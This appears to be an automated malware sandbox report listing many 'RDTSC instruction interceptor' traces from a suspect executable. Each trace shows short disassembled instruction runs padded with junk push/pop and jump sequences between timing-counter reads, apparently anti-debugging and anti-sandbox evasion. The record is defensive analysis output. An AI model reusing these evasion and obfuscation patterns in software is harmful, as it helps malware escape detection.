Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A4AD second address: 113A562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 or edi, 013CEBD2h 0x0000000f push 00000003h 0x00000011 jmp 00007FBF09325ABEh 0x00000016 push 00000000h 0x00000018 jmp 00007FBF09325AC7h 0x0000001d push 00000003h 0x0000001f jmp 00007FBF09325ABEh 0x00000024 movsx esi, bx 0x00000027 push 971AC9C5h 0x0000002c jmp 00007FBF09325AC1h 0x00000031 xor dword ptr [esp], 571AC9C5h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007FBF09325AB8h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov cx, B9B8h 0x00000056 sub dword ptr [ebp+122D1CBCh], eax 0x0000005c lea ebx, dword ptr [ebp+124502F6h] 0x00000062 jnl 00007FBF09325ABCh 0x00000068 or esi, dword ptr [ebp+122D28B5h] 0x0000006e push eax 0x0000006f pushad 0x00000070 jmp 00007FBF09325ABCh 0x00000075 push esi 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A5A8 second address: 113A5DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FBF08D3334Eh 0x0000000e jg 00007FBF08D33348h 0x00000014 popad 0x00000015 nop 0x00000016 mov si, dx 0x00000019 push 00000000h 0x0000001b add dword ptr [ebp+122D2252h], ebx 0x00000021 push C425450Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 push edi 0x00000029 pushad 0x0000002a popad 0x0000002b pop edi 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A5DF second address: 113A5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF09325AC0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A6D9 second address: 113A6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A6DD second address: 113A6EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A6EC second address: 113A704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF08D33354h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A704 second address: 113A781 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jp 00007FBF09325ACAh 0x0000000f lea ebx, dword ptr [ebp+124502FFh] 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FBF09325AB8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f call 00007FBF09325AC9h 0x00000034 mov dword ptr [ebp+122D1CAFh], eax 0x0000003a pop edx 0x0000003b movsx edi, si 0x0000003e push eax 0x0000003f jbe 00007FBF09325AC2h 0x00000045 jc 00007FBF09325ABCh 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A826 second address: 113A83B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jng 00007FBF08D33346h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A83B second address: 113A83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A83F second address: 113A851 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF08D33346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A851 second address: 113A855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A855 second address: 113A86E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBF08D33346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f je 00007FBF08D33354h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A86E second address: 113A872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A872 second address: 113A907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add edi, dword ptr [ebp+122D2452h] 0x0000000d push 00000003h 0x0000000f mov si, 8740h 0x00000013 push 00000000h 0x00000015 mov ch, ah 0x00000017 push 00000003h 0x00000019 mov esi, edx 0x0000001b jmp 00007FBF08D33356h 0x00000020 push 8F144212h 0x00000025 jnc 00007FBF08D3335Ah 0x0000002b xor dword ptr [esp], 4F144212h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FBF08D33348h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D24D7h], esi 0x00000052 lea ebx, dword ptr [ebp+1245030Ah] 0x00000058 mov di, 5B44h 0x0000005c xchg eax, ebx 0x0000005d push ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 jg 00007FBF08D33346h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A907 second address: 113A92E instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF09325AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF09325AC9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A92E second address: 113A938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FBF08D33346h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114CAAB second address: 114CAAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115B2D8 second address: 115B2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115B2DC second address: 115B319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBF09325AC0h 0x0000000e jmp 00007FBF09325AC8h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115B319 second address: 115B31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11299DF second address: 11299E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11299E6 second address: 11299F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FBF08D33346h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11299F0 second address: 11299F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1159289 second address: 115928D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115928D second address: 11592B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325ABEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBF09325AC1h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11596BD second address: 11596C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1159820 second address: 115982E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325ABAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11599B2 second address: 11599B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11599B8 second address: 11599BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11599BE second address: 11599C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11599C2 second address: 11599C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1159C35 second address: 1159C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1159C3E second address: 1159C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1159C44 second address: 1159C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1159C48 second address: 1159C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1159C58 second address: 1159C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1159C5C second address: 1159C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FBF09325AC2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1159C6C second address: 1159C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A0AC second address: 115A0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF09325AC9h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A0CA second address: 115A0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A0D0 second address: 115A0D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A0D6 second address: 115A0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FBF08D33352h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A0E4 second address: 115A0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A0EA second address: 115A0F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A0F4 second address: 115A100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBF09325AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A100 second address: 115A10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A10B second address: 115A10F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A2A1 second address: 115A2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A2A5 second address: 115A2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A2A9 second address: 115A2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBF08D33346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A2B8 second address: 115A2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF09325AC3h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A2D7 second address: 115A2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115A2DB second address: 115A2EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1151D8A second address: 1151D90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115AA4E second address: 115AA73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325AC2h 0x00000007 jmp 00007FBF09325ABFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115CF93 second address: 115CF98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E8CE second address: 115E8D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E8D2 second address: 115E8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FBF08D3334Dh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115E8F1 second address: 115E8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115EA45 second address: 115EA5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D33354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166EE4 second address: 1166F04 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF09325AB6h 0x00000008 jmp 00007FBF09325AC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166F04 second address: 1166F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF08D3334Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166286 second address: 116629C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBF09325AB6h 0x0000000a jmp 00007FBF09325ABBh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116629C second address: 11662A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11662A1 second address: 11662BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jl 00007FBF09325AB6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jl 00007FBF09325AE9h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11662BF second address: 11662C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116670E second address: 1166712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166712 second address: 116672C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D33350h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166A0D second address: 1166A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166A13 second address: 1166A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166A19 second address: 1166A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBF09325ABEh 0x0000000b jmp 00007FBF09325ABBh 0x00000010 jne 00007FBF09325AB6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166A3F second address: 1166AB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FBF08D33355h 0x0000000a je 00007FBF08D33346h 0x00000010 jmp 00007FBF08D33356h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FBF08D3334Fh 0x0000001c jmp 00007FBF08D33358h 0x00000021 jns 00007FBF08D33346h 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FBF08D3334Dh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1166AB6 second address: 1166ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1169218 second address: 116921D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116921D second address: 1169223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B76C second address: 116B77B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF08D3334Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B8DC second address: 116B8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116BC69 second address: 116BC6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116BC6D second address: 116BC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116BD16 second address: 116BD1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116BD1B second address: 116BD41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FBF09325AC9h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C3C1 second address: 116C3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C3C5 second address: 116C3CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C910 second address: 116C927 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007FBF08D33346h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jp 00007FBF08D33346h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C927 second address: 116C930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116CF15 second address: 116CF28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF08D3334Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116CF28 second address: 116CF2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116EA06 second address: 116EA0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116EA0B second address: 116EA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF09325ABEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FBF09325AB8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116EA2B second address: 116EA88 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF08D33348h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007FBF08D33353h 0x00000012 mov di, F3D7h 0x00000016 pop edi 0x00000017 push 00000000h 0x00000019 cmc 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007FBF08D33348h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 xchg eax, ebx 0x00000037 push ecx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d popad 0x0000003e pop ecx 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116E19B second address: 116E1A9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF09325AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
